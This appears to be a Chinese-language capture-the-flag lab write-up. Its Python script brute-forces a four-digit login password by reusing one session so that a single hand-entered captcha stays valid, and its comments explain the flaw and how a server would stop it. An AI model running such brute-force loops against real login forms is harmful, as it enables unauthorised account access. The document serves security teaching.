解决本题的关键是维护同一个账号的会话(session),这样验证码就可以确定下来。
先获取到验证码的地址(在 r1.text 中),手动输入验证码 vcode,再进行密码爆破。
#coding=utf-8
from http import cookies
import requests;
from lxml import etree #解析html页面的包
if __name__ == "__main__":
    # Lab exercise: the login form asks for a captcha ("vcode") plus a
    # four-digit password. The script reads the captcha once and then reuses
    # it for every guess, which only works because the server keeps accepting
    # the same captcha for the whole session. A server that discarded the
    # captcha after each check and limited failed logins per account would
    # stop this loop after the first wrong guess.
    index_url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php"
    login_url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"

    # A single Session carries the same cookies on every request, so the
    # captcha stored server-side for this session does not change.
    session = requests.session()
    r1 = session.get(index_url)
    print(r1.text)  # the captcha image address is somewhere in this HTML
    vcode = input()  # captcha value, read by a human and typed in once

    for candidate in range(1000, 10000):
        form = {
            # NOTE(review): 'amdin' looks like a typo for 'admin' -- confirm
            # against the lab's login form before relying on the result.
            'username': 'amdin',
            'pwd': candidate,
            'vcode': vcode,
            'submit': 'submit',
        }
        reply = session.post(login_url, data=form)
        # Use the detected encoding so Chinese text is not garbled.
        reply.encoding = reply.apparent_encoding
        # The absence of the "pwd error" marker is treated as success.
        # NOTE(review): any other reply (captcha rejected, server error page)
        # also ends the loop, so the printed text must be read to confirm.
        if "pwd error" not in reply.text:
            print(reply.text)
            break